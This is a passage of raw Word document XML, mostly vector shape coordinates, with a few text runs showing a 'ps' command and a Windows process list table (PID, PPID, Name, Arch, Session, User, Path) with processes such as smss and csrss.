501,6004,13501,6006,13501,6008,13501,6010,13501,6013,13501,6015,13501,6017,13501,6019,13501,6022,13501,6024,13501,6027,13501,6029,13501,6032,13501,6034,13501,6037,13501,6040,13501,6043,13501,6045,13501,6048,13501,6051,13501,6054,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13502,6057,13502,6057,13502,6057,13502,6057,13502,6057,13502,6057,13503,6057,13503,6057,13503,6057,13503,6057,13504,6057,13504,6057,13504,6057,13505,6057,13505,6057,13506,6057,13506,6057,13507,6057,13507,6057,13508,6057,13508,6057,13509,6057,13510,6057,13510,6057,13511,6057,13512,6057,13513,6057,13514,6057,13515,6057,13516,6057,13517,6057,13518,6057,13519,6057,13520,6057,13521,6057,13522,6057,13523,6057,13525,6057,13526,6057,13527,6057,13529,6057,13530,6057,13532,6057,13533,6057,13535,6057,13537,6057,13539,6057,13540,6057,13542,6057,13544,6057,13546,6057,13548,6057,13551,6057,13553,6057,13555,6057,13557,6057,13560,6057,13562,6057,13565,6057,13567,6057,13570,6057,13573,6057,13575,6057,13578,6057,13581,6057,13584,6057,13587,6057,13591,6057,13594,6057,13597,6057,13600,6057,13604,6057,13608,6057,13611,6057,13615,6057,13619,6057,13623,6057,13627,6057,13631,6057,13635,6057,13639,6057,13643,6057,13648,6057,13652,6057,13657,6057,13661,6057,13666,6057,13671,6057,13676,6057,13681,6057,13686,6057,13692,6057,13697,6057,13702,6057,13708,6057,13713,6057,13719,6057,13725,6057,13731,6057,13737,6057,13743,6057,13750,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6056,13756,6056,13756,6056,13756,6056,13756,6056,13756,6056,13756,6056,13756,6056,13756,6055,13756,6055,13756,6055,13756,6055,13756,6055,13756,6054,13756,6054,13756,6054,13756,6054,13756,6053,13756,6053,13756,6053,13756,6052,13756,6052,13756,6052,13756,6051,13756,6051,13756,6051,13756,6050,13756,6050,13756,6049,13756,6049,13756,6048,13756,6048,13756,6047,13756,6046,13756,6046,13756,6045,13756,6045,13756,6044,13756,6043,13756,6042,13756,6042,13756,6041,13756,6040,13756,6039,13756,6038,13756,6037,13756,6037,13756,6036,13756,6035,13756,6034,13756,6033,13756,6032,13756,6030,13756,6029,13756,6028,13756,6027,13756,6026,13756,6025,13756,6023,13756,6022,13756,6021,13756,6019,13756,6018,13756,6016,13756,6015,13756,6013,13756,6012,13756,6010,13756,6008,13756,6007,13756,6005,13756,6003,13756,6002,13756,6000,13756,5998,13756,5996,13756,5994,13756,5992,13756,5990,13756,5988,13756,5986,13756,5984,13756,5981,13756,5979,13756,5977,13756,5975,13756,5972,13756,5970,13756,5967,13756,5965,13756,5962,13756,5960,13756,5957,13756,5954,13756,5951,13756,5949,13756,5946,13756,5943,13756,5940,13756,5937,13756,5937,13756,5937,13756,5937,13756,5937,13756,5937,13756,5937,13756,5937,13756,5937,13756,5937,13756,5937,13756,5937,13756,5937,13756,5937,13756,5937,13756,5937,13756,5937,13755,5937,13755,5937,13755,5937,13755,5937,13755,5937,13755,5937,13755,5937,13754,5937,13754,5937,13754,5937,13754,5937,13753,5937,13753,5937,13753,5937,13752,5937,13752,5937,13751,5937,13751,5937,13750,5937,13750,5937,13749,5937,13749,5937,13748,5937,13748,5937,13747,5937,13746,5937,13745,5937,13745,5937,13744,5937,13743,5937,13742,5937,13741,5937,13740,5937,13739,5937,13738,5937,13737,5937,13736,5937,13735,5937,13733,5937,13732,5937,13731,5937,13729,5937,13728,5937,13726,5937,13725,5937,13723,5937,13722,5937,13720,5937,13718,5937,13716,5937,13714,5937,13712,5937,13710,5937,13708,5937,13706,5937,13704,5937,13702,5937,13699,5937,13697,5937,13695,5937,13692,5937,13689,5937,13687,5937,13684,5937,13681,5937,13678,5937,13675,5937,13672,5937,13669,5937,13666,5937,13663,5937,13660,5937,13656,5937,13653,5937,13649,5937,13646,5937,13642,5937,13638,5937,13634,5937,13630,5937,13626,5937,13622,5937,13618,5937,13613,5937,13609,5937,13605,5937,13600,5937,13595,5937,13590,5937,13586,5937,13581,5937,13576,5937,13570,5937,13565,5937,13560,5937,13554,5937,13549,5937,13543,5937,13537,5937,13532,5937,13526,5937,13520,5937,13513,5937,13507,5937,13501e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:301.500pt;margin-top:674.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6030,13490" coordsize="130,250">
        <v:shape style="position:absolute;left:6030;top:13490;width:130;height:250" coordorigin="6030,13490" coordsize="130,250" path="m6057,13501l6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6057,13501,6058,13501,6058,13501,6058,13501,6058,13501,6058,13501,6058,13501,6058,13501,6058,13501,6058,13501,6059,13501,6059,13501,6059,13501,6059,13501,6059,13501,6060,13501,6060,13501,6060,13501,6060,13501,6061,13501,6061,13501,6061,13501,6062,13501,6062,13501,6062,13501,6063,13501,6063,13501,6064,13501,6064,13501,6064,13501,6065,13501,6065,13501,6066,13501,6067,13501,6067,13501,6068,13501,6068,13501,6069,13501,6070,13501,6070,13501,6071,13501,6072,13501,6072,13501,6073,13501,6074,13501,6075,13501,6076,13501,6077,13501,6078,13501,6078,13501,6079,13501,6080,13501,6081,13501,6083,13501,6084,13501,6085,13501,6086,13501,6087,13501,6088,13501,6090,13501,6091,13501,6092,13501,6094,13501,6095,13501,6096,13501,6098,13501,6099,13501,6101,13501,6102,13501,6104,13501,6106,13501,6107,13501,6109,13501,6111,13501,6113,13501,6114,13501,6116,13501,6118,13501,6120,13501,6122,13501,6124,13501,6126,13501,6128,13501,6130,13501,6133,13501,6135,13501,6137,13501,6140,13501,6142,13501,6144,13501,6147,13501,6149,13501,6152,13501,6154,13501,6157,13501,6160,13501,6163,13501,6165,13501,6168,13501,6171,13501,6174,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13502,6177,13502,6177,13502,6177,13502,6177,13502,6177,13502,6177,13503,6177,13503,6177,13503,6177,13503,6177,13504,6177,13504,6177,13504,6177,13505,6177,13505,6177,13506,6177,13506,6177,13507,6177,13507,6177,13508,6177,13508,6177,13509,6177,13510,6177,13510,6177,13511,6177,13512,6177,13513,6177,13514,6177,13515,6177,13516,6177,13517,6177,13518,6177,13519,6177,13520,6177,13521,6177,13522,6177,13523,6177,13525,6177,13526,6177,13527,6177,13529,6177,13530,6177,13532,6177,13533,6177,13535,6177,13537,6177,13539,6177,13540,6177,13542,6177,13544,6177,13546,6177,13548,6177,13551,6177,13553,6177,13555,6177,13557,6177,13560,6177,13562,6177,13565,6177,13567,6177,13570,6177,13573,6177,13575,6177,13578,6177,13581,6177,13584,6177,13587,6177,13591,6177,13594,6177,13597,6177,13600,6177,13604,6177,13608,6177,13611,6177,13615,6177,13619,6177,13623,6177,13627,6177,13631,6177,13635,6177,13639,6177,13643,6177,13648,6177,13652,6177,13657,6177,13661,6177,13666,6177,13671,6177,13676,6177,13681,6177,13686,6177,13692,6177,13697,6177,13702,6177,13708,6177,13713,6177,13719,6177,13725,6177,13731,6177,13737,6177,13743,6177,13750,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6176,13756,6176,13756,6176,13756,6176,13756,6176,13756,6176,13756,6176,13756,6176,13756,6175,13756,6175,13756,6175,13756,6175,13756,6175,13756,6174,13756,6174,13756,6174,13756,6174,13756,6173,13756,6173,13756,6173,13756,6172,13756,6172,13756,6171,13756,6171,13756,6171,13756,6170,13756,6170,13756,6169,13756,6169,13756,6168,13756,6168,13756,6167,13756,6167,13756,6166,13756,6165,13756,6165,13756,6164,13756,6163,13756,6162,13756,6162,13756,6161,13756,6160,13756,6159,13756,6158,13756,6158,13756,6157,13756,6156,13756,6155,13756,6154,13756,6153,13756,6152,13756,6151,13756,6149,13756,6148,13756,6147,13756,6146,13756,6145,13756,6143,13756,6142,13756,6141,13756,6139,13756,6138,13756,6136,13756,6135,13756,6133,13756,6132,13756,6130,13756,6129,13756,6127,13756,6125,13756,6123,13756,6122,13756,6120,13756,6118,13756,6116,13756,6114,13756,6112,13756,6110,13756,6108,13756,6106,13756,6104,13756,6102,13756,6099,13756,6097,13756,6095,13756,6092,13756,6090,13756,6087,13756,6085,13756,6082,13756,6080,13756,6077,13756,6074,13756,6072,13756,6069,13756,6066,13756,6063,13756,6060,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13756,6057,13755,6057,13755,6057,13755,6057,13755,6057,13755,6057,13755,6057,13755,6057,13754,6057,13754,6057,13754,6057,13754,6057,13753,6057,13753,6057,13753,6057,13752,6057,13752,6057,13751,6057,13751,6057,13750,6057,13750,6057,13749,6057,13749,6057,13748,6057,13748,6057,13747,6057,13746,6057,13745,6057,13745,6057,13744,6057,13743,6057,13742,6057,13741,6057,13740,6057,13739,6057,13738,6057,13737,6057,13736,6057,13735,6057,13733,6057,13732,6057,13731,6057,13729,6057,13728,6057,13726,6057,13725,6057,13723,6057,13722,6057,13720,6057,13718,6057,13716,6057,13714,6057,13712,6057,13710,6057,13708,6057,13706,6057,13704,6057,13702,6057,13699,6057,13697,6057,13695,6057,13692,6057,13689,6057,13687,6057,13684,6057,13681,6057,13678,6057,13675,6057,13672,6057,13669,6057,13666,6057,13663,6057,13660,6057,13656,6057,13653,6057,13649,6057,13646,6057,13642,6057,13638,6057,13634,6057,13630,6057,13626,6057,13622,6057,13618,6057,13613,6057,13609,6057,13605,6057,13600,6057,13595,6057,13590,6057,13586,6057,13581,6057,13576,6057,13570,6057,13565,6057,13560,6057,13554,6057,13549,6057,13543,6057,13537,6057,13532,6057,13526,6057,13520,6057,13513,6057,13507,6057,13501e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:307.500pt;margin-top:674.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6150,13490" coordsize="130,250">
        <v:shape style="position:absolute;left:6150;top:13490;width:130;height:250" coordorigin="6150,13490" coordsize="130,250" path="m6177,13501l6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6177,13501,6178,13501,6178,13501,6178,13501,6178,13501,6178,13501,6178,13501,6178,13501,6178,13501,6178,13501,6179,13501,6179,13501,6179,13501,6179,13501,6179,13501,6179,13501,6180,13501,6180,13501,6180,13501,6180,13501,6181,13501,6181,13501,6181,13501,6182,13501,6182,13501,6182,13501,6183,13501,6183,13501,6184,13501,6184,13501,6185,13501,6185,13501,6185,13501,6186,13501,6187,13501,6187,13501,6188,13501,6188,13501,6189,13501,6190,13501,6190,13501,6191,13501,6192,13501,6192,13501,6193,13501,6194,13501,6195,13501,6196,13501,6197,13501,6198,13501,6199,13501,6200,13501,6201,13501,6202,13501,6203,13501,6204,13501,6205,13501,6206,13501,6207,13501,6208,13501,6210,13501,6211,13501,6212,13501,6214,13501,6215,13501,6216,13501,6218,13501,6219,13501,6221,13501,6222,13501,6224,13501,6226,13501,6227,13501,6229,13501,6231,13501,6233,13501,6234,13501,6236,13501,6238,13501,6240,13501,6242,13501,6244,13501,6246,13501,6248,13501,6251,13501,6253,13501,6255,13501,6257,13501,6260,13501,6262,13501,6264,13501,6267,13501,6269,13501,6272,13501,6275,13501,6277,13501,6280,13501,6283,13501,6285,13501,6288,13501,6291,13501,6294,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13502,6297,13502,6297,13502,6297,13502,6297,13502,6297,13502,6297,13503,6297,13503,6297,13503,6297,13503,6297,13504,6297,13504,6297,13504,6297,13505,6297,13505,6297,13506,6297,13506,6297,13507,6297,13507,6297,13508,6297,13508,6297,13509,6297,13510,6297,13510,6297,13511,6297,13512,6297,13513,6297,13514,6297,13515,6297,13516,6297,13517,6297,13518,6297,13519,6297,13520,6297,13521,6297,13522,6297,13523,6297,13525,6297,13526,6297,13527,6297,13529,6297,13530,6297,13532,6297,13533,6297,13535,6297,13537,6297,13539,6297,13540,6297,13542,6297,13544,6297,13546,6297,13548,6297,13551,6297,13553,6297,13555,6297,13557,6297,13560,6297,13562,6297,13565,6297,13567,6297,13570,6297,13573,6297,13575,6297,13578,6297,13581,6297,13584,6297,13587,6297,13591,6297,13594,6297,13597,6297,13600,6297,13604,6297,13608,6297,13611,6297,13615,6297,13619,6297,13623,6297,13627,6297,13631,6297,13635,6297,13639,6297,13643,6297,13648,6297,13652,6297,13657,6297,13661,6297,13666,6297,13671,6297,13676,6297,13681,6297,13686,6297,13692,6297,13697,6297,13702,6297,13708,6297,13713,6297,13719,6297,13725,6297,13731,6297,13737,6297,13743,6297,13750,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6296,13756,6296,13756,6296,13756,6296,13756,6296,13756,6296,13756,6296,13756,6295,13756,6295,13756,6295,13756,6295,13756,6295,13756,6294,13756,6294,13756,6294,13756,6294,13756,6293,13756,6293,13756,6293,13756,6292,13756,6292,13756,6292,13756,6291,13756,6291,13756,6290,13756,6290,13756,6289,13756,6289,13756,6288,13756,6288,13756,6287,13756,6287,13756,6286,13756,6285,13756,6285,13756,6284,13756,6283,13756,6283,13756,6282,13756,6281,13756,6280,13756,6279,13756,6278,13756,6278,13756,6277,13756,6276,13756,6275,13756,6274,13756,6273,13756,6272,13756,6271,13756,6269,13756,6268,13756,6267,13756,6266,13756,6265,13756,6263,13756,6262,13756,6261,13756,6259,13756,6258,13756,6256,13756,6255,13756,6253,13756,6252,13756,6250,13756,6249,13756,6247,13756,6245,13756,6243,13756,6242,13756,6240,13756,6238,13756,6236,13756,6234,13756,6232,13756,6230,13756,6228,13756,6226,13756,6224,13756,6222,13756,6219,13756,6217,13756,6215,13756,6212,13756,6210,13756,6207,13756,6205,13756,6202,13756,6200,13756,6197,13756,6194,13756,6192,13756,6189,13756,6186,13756,6183,13756,6180,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13756,6177,13755,6177,13755,6177,13755,6177,13755,6177,13755,6177,13755,6177,13755,6177,13754,6177,13754,6177,13754,6177,13754,6177,13753,6177,13753,6177,13753,6177,13752,6177,13752,6177,13751,6177,13751,6177,13750,6177,13750,6177,13749,6177,13749,6177,13748,6177,13748,6177,13747,6177,13746,6177,13745,6177,13745,6177,13744,6177,13743,6177,13742,6177,13741,6177,13740,6177,13739,6177,13738,6177,13737,6177,13736,6177,13735,6177,13733,6177,13732,6177,13731,6177,13729,6177,13728,6177,13726,6177,13725,6177,13723,6177,13722,6177,13720,6177,13718,6177,13716,6177,13714,6177,13712,6177,13710,6177,13708,6177,13706,6177,13704,6177,13702,6177,13699,6177,13697,6177,13695,6177,13692,6177,13689,6177,13687,6177,13684,6177,13681,6177,13678,6177,13675,6177,13672,6177,13669,6177,13666,6177,13663,6177,13660,6177,13656,6177,13653,6177,13649,6177,13646,6177,13642,6177,13638,6177,13634,6177,13630,6177,13626,6177,13622,6177,13618,6177,13613,6177,13609,6177,13605,6177,13600,6177,13595,6177,13590,6177,13586,6177,13581,6177,13576,6177,13570,6177,13565,6177,13560,6177,13554,6177,13549,6177,13543,6177,13537,6177,13532,6177,13526,6177,13520,6177,13513,6177,13507,6177,13501e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:313.500pt;margin-top:674.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6270,13490" coordsize="130,250">
        <v:shape style="position:absolute;left:6270;top:13490;width:130;height:250" coordorigin="6270,13490" coordsize="130,250" path="m6297,13501l6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6297,13501,6298,13501,6298,13501,6298,13501,6298,13501,6298,13501,6298,13501,6298,13501,6298,13501,6298,13501,6298,13501,6299,13501,6299,13501,6299,13501,6299,13501,6299,13501,6300,13501,6300,13501,6300,13501,6300,13501,6300,13501,6301,13501,6301,13501,6301,13501,6302,13501,6302,13501,6302,13501,6303,13501,6303,13501,6304,13501,6304,13501,6305,13501,6305,13501,6306,13501,6306,13501,6307,13501,6307,13501,6308,13501,6308,13501,6309,13501,6310,13501,6310,13501,6311,13501,6312,13501,6313,13501,6313,13501,6314,13501,6315,13501,6316,13501,6317,13501,6318,13501,6319,13501,6320,13501,6321,13501,6322,13501,6323,13501,6324,13501,6325,13501,6326,13501,6327,13501,6328,13501,6330,13501,6331,13501,6332,13501,6334,13501,6335,13501,6336,13501,6338,13501,6339,13501,6341,13501,6342,13501,6344,13501,6346,13501,6347,13501,6349,13501,6351,13501,6353,13501,6354,13501,6356,13501,6358,13501,6360,13501,6362,13501,6364,13501,6366,13501,6368,13501,6371,13501,6373,13501,6375,13501,6377,13501,6380,13501,6382,13501,6384,13501,6387,13501,6389,13501,6392,13501,6395,13501,6397,13501,6400,13501,6403,13501,6406,13501,6408,13501,6411,13501,6414,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13501,6417,13502,6417,13502,6417,13502,6417,13502,6417,13502,6417,13502,6417,13503,6417,13503,6417,13503,6417,13503,6417,13504,6417,13504,6417,13504,6417,13505,6417,13505,6417,13506,6417,13506,6417,13507,6417,13507,6417,13508,6417,13508,6417,13509,6417,13510,6417,13510,6417,13511,6417,13512,6417,13513,6417,13514,6417,13515,6417,13516,6417,13517,6417,13518,6417,13519,6417,13520,6417,13521,6417,13522,6417,13523,6417,13525,6417,13526,6417,13527,6417,13529,6417,13530,6417,13532,6417,13533,6417,13535,6417,13537,6417,13539,6417,13540,6417,13542,6417,13544,6417,13546,6417,13548,6417,13551,6417,13553,6417,13555,6417,13557,6417,13560,6417,13562,6417,13565,6417,13567,6417,13570,6417,13573,6417,13575,6417,13578,6417,13581,6417,13584,6417,13587,6417,13591,6417,13594,6417,13597,6417,13600,6417,13604,6417,13608,6417,13611,6417,13615,6417,13619,6417,13623,6417,13627,6417,13631,6417,13635,6417,13639,6417,13643,6417,13648,6417,13652,6417,13657,6417,13661,6417,13666,6417,13671,6417,13676,6417,13681,6417,13686,6417,13692,6417,13697,6417,13702,6417,13708,6417,13713,6417,13719,6417,13725,6417,13731,6417,13737,6417,13743,6417,13750,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6417,13756,6416,13756,6416,13756,6416,13756,6416,13756,6416,13756,6416,13756,6416,13756,6415,13756,6415,13756,6415,13756,6415,13756,6415,13756,6414,13756,6414,13756,6414,13756,6414,13756,6413,13756,6413,13756,6413,13756,6412,13756,6412,13756,6412,13756,6411,13756,6411,13756,6410,13756,6410,13756,6409,13756,6409,13756,6408,13756,6408,13756,6407,13756,6407,13756,6406,13756,6405,13756,6405,13756,6404,13756,6403,13756,6403,13756,6402,13756,6401,13756,6400,13756,6399,13756,6399,13756,6398,13756,6397,13756,6396,13756,6395,13756,6394,13756,6393,13756,6392,13756,6391,13756,6390,13756,6388,13756,6387,13756,6386,13756,6385,13756,6383,13756,6382,13756,6381,13756,6379,13756,6378,13756,6376,13756,6375,13756,6373,13756,6372,13756,6370,13756,6369,13756,6367,13756,6365,13756,6364,13756,6362,13756,6360,13756,6358,13756,6356,13756,6354,13756,6352,13756,6350,13756,6348,13756,6346,13756,6344,13756,6342,13756,6339,13756,6337,13756,6335,13756,6332,13756,6330,13756,6327,13756,6325,13756,6322,13756,6320,13756,6317,13756,6314,13756,6312,13756,6309,13756,6306,13756,6303,13756,6300,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13756,6297,13755,6297,13755,6297,13755,6297,13755,6297,13755,6297,13755,6297,13755,6297,13754,6297,13754,6297,13754,6297,13754,6297,13753,6297,13753,6297,13753,6297,13752,6297,13752,6297,13751,6297,13751,6297,13750,6297,13750,6297,13749,6297,13749,6297,13748,6297,13748,6297,13747,6297,13746,6297,13745,6297,13745,6297,13744,6297,13743,6297,13742,6297,13741,6297,13740,6297,13739,6297,13738,6297,13737,6297,13736,6297,13735,6297,13733,6297,13732,6297,13731,6297,13729,6297,13728,6297,13726,6297,13725,6297,13723,6297,13722,6297,13720,6297,13718,6297,13716,6297,13714,6297,13712,6297,13710,6297,13708,6297,13706,6297,13704,6297,13702,6297,13699,6297,13697,6297,13695,6297,13692,6297,13689,6297,13687,6297,13684,6297,13681,6297,13678,6297,13675,6297,13672,6297,13669,6297,13666,6297,13663,6297,13660,6297,13656,6297,13653,6297,13649,6297,13646,6297,13642,6297,13638,6297,13634,6297,13630,6297,13626,6297,13622,6297,13618,6297,13613,6297,13609,6297,13605,6297,13600,6297,13595,6297,13590,6297,13586,6297,13581,6297,13576,6297,13570,6297,13565,6297,13560,6297,13554,6297,13549,6297,13543,6297,13537,6297,13532,6297,13526,6297,13520,6297,13513,6297,13507,6297,13501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6" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7912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ps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2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9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Process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>List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8392" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="9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-10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==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==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5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PID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PPID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Name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Arch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Session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User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Path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404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System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Process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12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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="17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1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System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15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236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smss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296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mscorsvw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324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316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csrss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842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:370" coordorigin="1490,990" coordsize="8990,3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8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1000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1000l1517,1000,1517,1000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8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18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1350" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1350;width:8990;height:370" coordorigin="1490,1350" coordsize="8990,37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5,10484,1375,10484,1375,10484,1376,10484,1376,10484,1376,10484,1376,10484,1376,10484,1377,10484,1377,10484,1377,10484,1378,10484,1378,10484,1378,10484,1379,10484,1379,10484,1380,10484,1380,10484,1381,10484,1382,10484,1382,10484,1383,10484,1384,10484,1385,10484,1386,10484,1386,10484,1387,10484,1388,10484,1389,10484,1391,10484,1392,10484,1393,10484,1394,10484,1395,10484,1397,10484,1398,10484,1400,10484,1401,10484,1403,10484,1405,10484,1407,10484,1408,10484,1410,10484,1412,10484,1414,10484,1416,10484,1419,10484,1421,10484,1423,10484,1426,10484,1428,10484,1431,10484,1433,10484,1436,10484,1439,10484,1442,10484,1445,10484,1448,10484,1451,10484,1454,10484,1458,10484,1461,10484,1465,10484,1469,10484,1472,10484,1476,10484,1480,10484,1484,10484,1488,10484,1493,10484,1497,10484,1501,10484,1506,10484,1511,10484,1515,10484,1520,10484,1525,10484,1531,10484,1536,10484,1541,10484,1547,10484,1552,10484,1558,10484,1564,10484,1570,10484,1576,10484,1582,10484,1588,10484,1595,10484,1602,10484,1608,10484,1615,10484,1622,10484,1629,10484,1637,10484,1644,10484,1651,10484,1659,10484,1667,10484,1675,10484,1683,10484,1691,10484,1700,10484,1708,10484,1717,10484,1726,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10483,1735,10482,1735,10482,1735,10480,1735,10479,1735,10477,1735,10475,1735,10473,1735,10470,1735,10466,1735,10462,1735,10458,1735,10453,1735,10448,1735,10442,1735,10435,1735,10428,1735,10419,1735,10411,1735,10401,1735,10391,1735,10379,1735,10367,1735,10354,1735,10340,1735,10326,1735,10310,1735,10293,1735,10275,1735,10256,1735,10236,1735,10215,1735,10192,1735,10168,1735,10143,1735,10117,1735,10090,1735,10061,1735,10031,1735,9999,1735,9966,1735,9931,1735,9895,1735,9858,1735,9819,1735,9778,1735,9735,1735,9691,1735,9646,1735,9598,1735,9549,1735,9498,1735,9445,1735,9391,1735,9334,1735,9275,1735,9215,1735,9153,1735,9088,1735,9022,1735,8953,1735,8883,1735,8810,1735,8735,1735,8658,1735,8578,1735,8497,1735,8413,1735,8326,1735,8238,1735,8146,1735,8053,1735,7957,1735,7859,1735,7758,1735,7654,1735,7548,1735,7439,1735,7328,1735,7214,1735,7097,1735,6977,1735,6855,1735,6730,1735,6602,1735,6471,1735,6337,1735,6201,1735,6061,1735,5918,1735,5773,1735,5624,1735,5472,1735,5317,1735,5159,1735,4997,1735,4833,1735,4665,1735,4494,1735,4319,1735,4141,1735,3960,1735,3776,1735,3587,1735,3396,1735,3201,1735,3002,1735,2800,1735,2594,1735,2385,1735,2172,1735,1955,1735,1734,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510